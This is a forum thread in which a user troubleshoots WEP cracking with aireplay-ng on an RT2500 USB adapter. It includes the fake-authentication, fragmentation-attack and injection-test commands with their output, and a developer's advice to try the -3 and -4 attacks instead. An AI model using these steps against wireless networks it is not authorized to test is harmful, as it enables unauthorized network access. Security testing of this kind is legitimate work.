Results 1 to 5 of 5

Thread: Hawking Wireless G and Aireplay

  1. #1
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    Question Hawking Wireless G and Aireplay

    Ok, so i'm new to the remote exploit forums so be gentle (i know the awe inspiring power of a moderator scorned).

    Basically, I hopped on the usb wifi card bandwagon (i'm a recovering pcmcia junkie). So i'm running through some issues i'm encountering with the new card. First the obligatory particulars:

    Its a Hawking wireless G usb wireless adapter.
    Its an RT2500 chipset adapter.
    I'm running BT3BETA (the current latest, i think released in Dec).

    So, WPA/WPA2 Cracking is going ok (well, its pretty much just a grab and bag anyway) but wep cracking is spotty. And here's why i say that.

    First, as usual i place the card in monitor mode (its rausb0).
    Then i perform the association and authentication step (aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI rausb0). Both successful.

    The problem starts when i go to perform the fragmentation attack. So, i run aireplay-ng -5 -b $AP -h $WIFI rausb0 and this is what i get after i select the packet to use:
    09:19:51 Data packet found!
    09:19:51 Sending fragmented packet
    09:19:53 No answer, repeating...
    <repeats a bit>
    09:20:39 Still nothing, trying another packet...

    This goes on for a bit. but never grabs the fragment xor file.

    Sometimes when i mess with antenna positioning i get:
    09:24:10 Data packet found!
    09:24:10 Sending fragmented packet
    09:24:12 No answer, repeating...
    09:24:12 Trying a LLC NULL packet
    09:24:12 Sending fragmented packet
    09:24:12 Got RELAYED packet!!
    09:24:12 Trying to get 384 bytes of a keystream
    09:24:14 No answer, repeating...

    (the GOT RELAYED packet!! and keystream line are different than before)
    sometimes i get a third variation with a lie saying not enough acks.

    The problem is i've seen on the same card for the fragment file to be created in like the first run through of a packet grabbed. Another time the second. I'm trying to get a better understanding of if its something i'm doing wrong or just signal, as i've had mixed results being able to crack an AP right next to me or one next door (dont worry my girlfriends sister lives next door to her and I got her permission, so dont hop on me Trolls!)

    I got so curious i ran the inject test built into aircrack with the following syntax:
    aireplay-ng -9 -e $SSID -a $AP -i ath0 rausb0

    and got:

    09:30:33 Waiting for beacon frame (BSSID: 00:19:E4:73:53:B9) on channel 11
    09:30:33 Trying broadcast probe requests...
    09:30:33 Injection is working!
    09:30:35 Found 1 AP

    09:30:35 Trying directed probe requests...
    09:30:35 00:19:E4:73:53:B9 - channel: 11 - '2WIRE744'
    09:30:37 Ping (min/avg/max): 0.695ms/58.322ms/68.006ms Power: 24.20
    09:30:37 30/30: 100%


    09:30:37 Trying card-to-card injection...
    09:30:37 Attack -0: OK
    09:30:37 Attack -1 (open): OK
    09:30:38 Attack -1 (psk): OK
    09:30:39 Attack -2/-3/-4: OK
    09:30:43 Attack -5: Failed

    ath0 is an internal wifi in my laptop.

    Guess i wrote a book there but any help is appreciated in advance.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Have you tried the -4 attack or the -3 attack. Please let us know how you get on with those.

  3. #3
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    Default

    -4 worked with the card. any idea why -5 isn't? Mac filtering you think?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Sometimes both attacks don't work. I imagine thats why there are two different ones.

  5. #5
    Junior Member tek911's Avatar
    Join Date
    Jan 2010
    Posts
    59

    Default

    Well hey, thanks for the help. Wep down, dictionary brute force of wpa/wpa2 down, airpwn (just fun) and now...time for learning about airolib and the aircrack-ng server pieces.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •